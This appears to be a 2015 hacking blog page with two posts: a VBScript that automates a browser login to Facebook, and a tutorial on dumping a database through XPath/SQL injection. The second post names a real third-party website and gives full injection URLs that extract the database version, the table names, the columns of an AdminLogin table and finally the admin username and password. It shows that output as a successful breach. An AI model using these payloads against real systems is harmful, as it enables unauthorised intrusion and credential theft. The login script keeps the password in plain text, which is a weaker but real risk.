Sunday, December 6, 2015

Auto Login Script by Darky!

Hello!
I am Asman Mirza and Today I will show you something very Intresting!! ;-)

Automatic Facebook Login!

Open Notepad And Paste This!!

set w=wscript.CreateObject("wscript.shell")
w.run "firefox.exe"
wscript.sleep (7000)
w.SendKeys "{F6}"
wscript.sleep (3000)
w.SendKeys " Facebook. Com "
w.SendKeys "{ENTER}"
wscript.sleep (10000)
w.SendKeys "(Your Email Here)"
wscript.sleep (2000)
w.SendKeys "{TAB}"
w.SendKeys "(Your Password Here)"
w.SendKeys "{ENTER}"

Save This As" FacebookLogin.vbs "

Now Run The FacebookLogin.vbs And You Will Be Logged In
The Firefox Directly..

This Can Be Configured For Any
Other Website Also and For any other Browser!

Just Change "Facebook. Com" With The Website Link you want to login like TWITTER,GMAIL,HOTMAIL ect anything you want!!
and also Change Your Email And Password.

And if you want to use other Browser except Firefox then just Change The Browser By Changing " firefox.exe " in the script With your respective Browser like "Chrome.exe" "Opera.exe" "Safari.exe" etc ...

Change Browser and Website as you want but don't forget to save the script as "script.vbs".

Thanks :-)

Posted by at No comments:
Labels: , , ,

How To Dump All Data In One Shot In Xpath Injection by Darky!!

Welcome back to TechynHacky!!
I am Asman and Today I will show you How To Dump All Data In One Shot In Xpath Injection.
So Lets starts :-)
Here Is  our Test site!! :)

""http://www.latintourdimensions.com/overview/product_detail.php?id=352""

First Found Xpath Vulnerablity Using

+and+extractvalue()--

Website will  Respond this!

[Incorrect parameter count in the call to native function 'extractvalue']

It means Website Is Vulnerable To XPATH Extractvalue Injection.!!

Okay Now Next Step :-)
Now Lets Find The Database & Version Of Database.
Here we will use this Query!

+Procedure Analyse+(extractvalue(0,concat(0x27,0x426c61436b526f7365,0x3a,@@version,database())),1) -- -

Our Website With Query will look like this!!

http://www.latintourdimensions.com/overview/product_detail.php?id=352+Procedure+Analyse+(extractvalue(0,concat(0x27,0x426c61436b526f7365,0x3a,@@version,database())),1) -- -

Website will responce something like this :-)

[XPATH syntax error: ''BlaCkRose:5.1.54-log:LTD']

In Simple Injection We Can't Extract Database, Version, & Table, Columns, In Single Query

Okay So Now We Need Tables Of Website..
So Here is our next Query!!

+Procedure+Analyse+(extractvalue(0,concat(0x27,(select+substr(group_concat(table_name),10,50)+from+information_schema.tables+where+table_schema=database()))),1)-- -

Using This Query We Can Extract All Tables Of Website From Database.
Website will look like  this with query!!

http://www.latintourdimensions.com/overview/product_detail.php?id=352+Procedure+Analyse+(extractvalue(0,concat(0x27,(select+substr(group_concat(table_name),10,50)+from+information_schema.tables+where+table_schema=database()))),1)-- -

Website Responce

[XPATH syntax error: ''s,AdminLogin,Agencia,Agente,Bro']

Now We Need Columns Of Table AdminLogin,
So Lets Start!!!
Next Query!!

+Procedure+Analyse+(extractvalue(0,concat(0x27,(select+group_concat(column_name)+from+information_schema.columns+where+table_name=TABLE HEX))),1)-- -

[AdminLogin] is a Weak Table In Database,
Okay Now Convert AdminLogin into HEX Format using online tools like!!

hex.online-toolz.com/tools/text-hex-convertor.php

and Yes also if you are Using Hackbar then just  Click On [Encoding > HEX Encoding > String To 00ff00ff]

Type AdminLogin In the PoP-Up Window And Hit Enter!!
and Use Hex Format In Query Like This [0xHEX FORMAT OF THE TABLE]

Website with Query will look like this!!

http://www.latintourdimensions.com/overview/product_detail.php?id=352+Procedure+Analyse+(extractvalue(0,concat(0x27,(select+group_concat(column_name)+from+information_schema.columns+where+table_name=0x41646d696e4c6f67696e))),1)-- -

Website Responding this!!

[XPATH syntax error: ''id,usuario,passw']

[usuario, passw,] are Weak Columns In Table AdminLogin,
So our Next Query will be this!!

+Procedure+Analyse+(extractvalue(0,concat(0x27,(select+group_concat(column1,0x7e,column2)+from+TABLE_NAME))),1)-- -

Now replace!
TABLE_NAME = AdminLogin
COLUMN1 = usuario
COLUMN2 = passw

Now our website with Query will look like this!!

http://www.latintourdimensions.com/overview/product_detail.php?id=352+Procedure+Analyse+(extractvalue(0,concat(0x27,(select+group_concat(usuario,0x7e,passw)+from+AdminLogin))),1)-- -

Website is respondin this!!
XPATH syntax error: ''admin~admin'

Here we got our things!! :-D
and We are Done.. :-P

Thanks for reading and Visiting :-P

Posted by at No comments:
Labels: , ,
Subscribe to: Posts (Atom)